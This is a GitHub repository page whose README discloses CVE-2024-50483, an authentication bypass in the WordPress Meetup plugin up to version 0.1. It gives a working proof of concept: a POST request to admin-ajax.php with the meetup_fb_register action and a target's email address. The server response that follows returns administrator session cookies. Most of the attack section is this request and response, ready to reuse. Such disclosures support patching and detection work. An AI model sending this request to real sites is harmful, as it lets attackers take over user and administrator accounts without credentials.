https://github.com/randomrobbiebf/cve-2024-50483

Meetup <= 0.1 - Authentication Bypass via Account Takeover
https://github.com/randomrobbiebf/cve-2024-50483

Last synced: 5 months ago
JSON representation

Meetup <= 0.1 - Authentication Bypass via Account Takeover

• Host: GitHub
• URL: https://github.com/randomrobbiebf/cve-2024-50483
• Owner: RandomRobbieBF
• Created: 2024-11-05T21:38:44.000Z (over 1 year ago)
• Default Branch: main
• Last Pushed: 2024-11-05T21:40:58.000Z (over 1 year ago)
• Last Synced: 2025-01-21T05:41:45.576Z (over 1 year ago)
• Size: 1.95 KB
• Stars: 2
• Watchers: 2
• Forks: 0
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

          
# CVE-2024-50483

Meetup <= 0.1 - Authentication Bypass via Account Takeover

# Description:

The Meetup plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 0.1. This is due to the plugin not properly verifying a user's identity prior to authenticating them via the facebook_register() function. This makes it possible for unauthenticated attackers to log in as any user, granted they know their email address.

```

CVE: CVE-2024-50483

CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS Score: 9.8

Slugs: meetup

```

Note: You need to know the users email address you want to login as.

POC

---

```

POST /wp-admin/admin-ajax.php HTTP/1.1

Host: kubernetes.docker.internal

Content-Type: application/x-www-form-urlencoded

Content-Length: 149

action=meetup_fb_register&email=admin@admin.com&first_name=Test&last_name=User&id=12345678901234567890&type=token&link=https://example.com/user/test/

```

Response

--

```

HTTP/1.1 200 OK

Date: Tue, 05 Nov 2024 21:37:23 GMT

Server: Apache/2.4.57 (Debian)

X-Powered-By: PHP/8.2.13

X-Robots-Tag: noindex

X-Content-Type-Options: nosniff

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Referrer-Policy: strict-origin-when-cross-origin

X-Frame-Options: SAMEORIGIN

Set-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-content/plugins; HttpOnly

Set-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-admin; HttpOnly

Set-Cookie: wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cecd2fbdf078b2f2b3735b5e423cfae0efa73526e26e17f3cd192896597c7b650; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/; HttpOnly

Content-Length: 0

Content-Type: text/html; charset=UTF-8

```